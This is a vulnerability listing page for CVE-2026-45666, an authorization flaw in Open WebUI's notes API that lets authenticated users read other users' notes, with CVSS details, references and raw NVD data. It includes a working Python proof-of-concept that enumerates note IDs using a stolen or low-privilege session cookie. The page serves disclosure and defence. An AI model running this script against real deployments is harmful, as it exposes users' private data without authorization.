CVE-2026-45666

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, the API /api/v1/notes/{note_id} endpoint lacks proper authorization checks, allowing authenticated users to retrieve notes belonging to other users by guessing or enumerating UUIDs. This results in unauthorized disclosure of potentially sensitive or private user data. This vulnerability is fixed in 0.8.11.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.8.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_idor(target_host, session_cookie):
    """
    Proof of Concept for CVE-2026-45666
    Demonstrates IDOR vulnerability in Open WebUI /api/v1/notes/{note_id}
    """
    headers = {
        "Cookie": f"auth_token={session_cookie}",
        "User-Agent": "CVE-2026-45666-Scanner"
    }
    
    # Example UUIDs to enumerate
    uuids_to_test = [
        "00000000-0000-0000-0000-000000000001",
        "00000000-0000-0000-0000-000000000002",
        "123e4567-e89b-12d3-a456-426614174000"
    ]

    print(f"[*] Starting IDOR scan against {target_host}")
    
    for note_id in uuids_to_test:
        url = f"{target_host}/api/v1/notes/{note_id}"
        try:
            response = requests.get(url, headers=headers, timeout=5)
            if response.status_code == 200:
                print(f"[+] Vulnerable! Retrieved data for {note_id}:")
                print(response.json())
            elif response.status_code == 401:
                print("[-] Authentication failed. Check session cookie.")
                break
            elif response.status_code == 404:
                print(f"[.] Note ID {note_id} not found (trying next...)")
        except Exception as e:
            print(f"[!] Error connecting to {url}: {e}")

if __name__ == "__main__":
    # Replace with actual target and a valid authenticated cookie
    TARGET = "http://localhost:3000"
    COOKIE = "VALID_LOW_PRIV_USER_COOKIE_HERE"
    exploit_idor(TARGET, COOKIE)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45666
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45666
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45666/
[4] VulDB https://vuldb.com/cve/CVE-2026-45666
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-x3qm-p8hr-3c3h

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45666", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:56.057", "lastModified": "2026-05-15T22:16:56.057", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, the API /api/v1/notes/{note_id} endpoint lacks proper authorization checks, allowing authenticated users to retrieve notes belonging to other users by guessing or enumerating UUIDs. This results in unauthorized disclosure of potentially sensitive or private user data. This vulnerability is fixed in 0.8.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-x3qm-p8hr-3c3h", "source": "[email protected]"}]}}